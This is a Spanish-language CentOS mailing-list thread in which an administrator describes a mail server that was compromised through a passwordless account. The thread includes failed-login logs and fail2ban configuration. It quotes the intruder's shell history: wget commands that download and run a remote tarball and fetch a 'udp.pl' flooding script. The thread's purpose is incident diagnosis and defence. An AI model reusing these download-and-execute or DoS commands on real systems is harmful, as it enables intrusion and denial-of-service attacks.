[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

tino en hostigal.com tino en hostigal.com
Lun Abr 15 16:26:11 UTC 2013 

Porque nos llegan los emails de todos a todos....

Saludos 
CELESTINO BARRIENTOS PEREZ
Dpto. de Gestión de Cuentas 
tino en hostigal.com

C/Rosalía de Castro 31, Entr. Dcha Milladoiro (Ames) 
Telf. 981 524 769 / Fax 981 935 338 
www.hostigal.com www.softigal.com 

La presente comunicación se realiza por Hostisoft S.L.. Sus datos personales forman parte de los ficheros de Hostisoft S.L., en virtud de las relaciones autorizadas mutuas. El correo electrónico se envía personalizado de manera que nunca podrá ver la dirección de correo de otro usuario ni tampoco otro usuario podrá ver la suya. Caso de no estar interesado en el envío de más información de su interés, puede acceder, modificar, así como proceder a la cancelación de sus datos a través de correo a lopd en hostisoft.com o mediante carta dirigida a Hostisoft S.L., Rosalía de Castro, 31 entreplanta derecha, Milladoiro, Ames (15895) A CORUÑA, acreditando su identidad.
Antes de imprimir este e-mail piense bien si es necesario hacerlo. El medioambiente es cosa de todos.


-----Mensaje original-----
De: centos-es-bounces en centos.org [mailto:centos-es-bounces en centos.org] En nombre de tito25 en gmail.com
Enviado el: lunes, 15 de abril de 2013 13:29
Para: centos-es en centos.org
Asunto: Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Podías considerar que ese servidor ya esta tomado podrías y seguirían
haciéndolo mientras más seguridad le pongas más trabajo le daras pero
seguirán con lo mismo  creo q debes considerar darle de baja, y armar Otro
servidor en paralelo con otra ip publica pero con otra protección y
cerrando algunos puertos.
El abr 5, 2013 10:12 a.m., "Luis Alberto Roman Aguirre" <
luisroman80 en hotmail.com> escribió:

> Buenas amigos Listeros:
> Retomando el tema del servidor de correos, perdón por el retraso, y
>  agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch
> Canu,Jose Fernández Rodríguez,Francesc Guitart  ...a la LISTA en GENERAL
> ..y  si me olvide de alguien mil disculpas.
> Bueno, es comento que los días posteriores fue tanto el escaneo que al
> final tomaron posesión de mi servidor a través de un usuario el cual borre
> pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo
> esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este
> archivo:
>
>
>
>
>   wget
>   www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz
>   tar -pxzf csservers_redirecte_linux_hlds.tar.gz
>   ps x
>   killall screen
>   ps x
>   free -m
>   screen
>   cd csservers_redirecte_linux_hlds
>   ./start
>   cd ..
>
>
>
>   #wget
>   http://y2khom3.evonet.ro/udp.pl
>   #wget
>   www.buble.biz/alinftp/udp.pl
>   #wget
>   www.packetstormsecurity.org/DoS/udp.pl
>   #ps x
>   #cd /tmp
>   #ls -a
>   #w
>
>
>
>
>
>
> Ahora les detallo que ingresaron por un usuario el cual hace reenvio de
> correos a nivel local el cual no tenia contraseña, en el nuevo servidor le
> puse contraseña a todos los usuarios y demas con
> caracteres(mayusculas,minusculas y  numeros). Lo que me sorprende fue aun
> despues de reinstalar el centos , creo ya que me agarraron de punto ,
> porque note que sigo siendo escaneado  por la misma lista antes de la
> reinstalacion les copio parte y  les adjunto en txt:dovecot: Authentication
> Failures:base: 1376
> Time(s)root: 52
> Time(s)postmaster
> rhost=190.210.136.21 : 32 Time(s)mlizana
> rhost=10.1.0.28 : 20 Time(s)aa
> rhost=113.162.161.245 : 18 Time(s)admin
> rhost=183.60.20.40 : 14 Time(s)mconde: 10
> Time(s)test
> rhost=183.60.20.40 : 10 Time(s)admin1
> rhost=183.60.20.40 : 8 Time(s)dedicated
> rhost=183.60.20.40 : 8 Time(s)html
> rhost=183.60.20.40 : 8 Time(s)user1
> rhost=183.60.20.40 : 8 Time(s)bdsistemas:
> 6 Time(s)
> La ip segun lo investigado es de China:
> http://whatismyipaddress.com/ip/183.60.20.40 y  salio esto:(ojo hay  otro
> router que salio mientras escribía es este http://201.77.5.191/ de
> Brazil)General IP
> InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet
> Guangdong Province NetworkOrganization:ChinaNet Guangdong Province
> NetworkServices:None detectedType:BroadbandAssignment:Static
> IPBlacklist:Geolocation InformationCountry:China
> State/Region:GuangdongCity:GuangzhouLatitude:23.1167  (23° 7′ 0.12″
> N)Longitude:113.25  (113° 15′ 0.00″ E)
>
> Por recomendación de los ya mencionados amigos instale el fail2ban pero
>  creo que no hace nada o  bien algo estoy  haciendo mal ,posteo
> configuracion:####Jail.conf[dovecot-pop3imap]enabled  = truefilter   =
> dovecot-pop3imapaction   = iptables-multiport[name=dovecot-pop3imap,
> port="pop3,pop3s,imap,imaps", protocol=tcp]
> sendmail-whois[name=dovecot-pop3imap, dest=root, sender=user en xxx.xxx]logpath
>  = /var/log/maillogmaxretry = 2#findtime = 600bantime  = 5200
> En la carpeta filter.d/dovecot-pop3imap.conf tengo
> esto:[Definition]failregex = dovecot: auth-worker\(default\):
> sql\(.*,<HOST>\): unknown user            dovecot: (pop3|imap)-login:
> Aborted login \(.*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login:
> Disconnected \(auth failed, .*\): .*, \[<HOST>\]            dovecot:
> auth\(default\): passdb\(.*,<HOST>\)\: Attempted login with password having
> illegal chars            dovecot: (pop3|imap)-login: Disconnected \(auth
> failed, .*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login: Aborted
> login: .*, \[<HOST>\]ignoreregex =
> La cosa que los escaneos que me hacen al dovecot  el fail2ban no tiene
> idea de ellos, algo estoy  haciendo mal?, estoy  por probar el OSSEC, pero
> si hay  otra herramienta o  bien algo mas que se pueda hacer, ya que ser
> victima de nuevo  y  lo peor que me baneen en la black list para una
> empresa que depende del correo es lo  peor que les puede suceder, hablo por
> la experiencia amigos.
>
> Gracias por la ayuda , por leer este mail, y  por soportarme amigos, desde
> ya muchas gracias por sus respuestas.PDT:prometo responder como me fue ,
> asi ayudar a alguien mas que pueda tener este problema
> Atte.
> Luis Roman
>
>
>
>
>
>
> _______________________________________________
> CentOS-es mailing list
> CentOS-es en centos.org
> http://lists.centos.org/mailman/listinfo/centos-es
>
>
_______________________________________________
CentOS-es mailing list
CentOS-es en centos.org
http://lists.centos.org/mailman/listinfo/centos-es
 

__________ Información de ESET NOD32 Antivirus, versión de la base de firmas de virus 8230 (20130415) __________

ESET NOD32 Antivirus ha comprobado este mensaje.

http://www.eset.com

Más información sobre la lista de distribución CentOS-es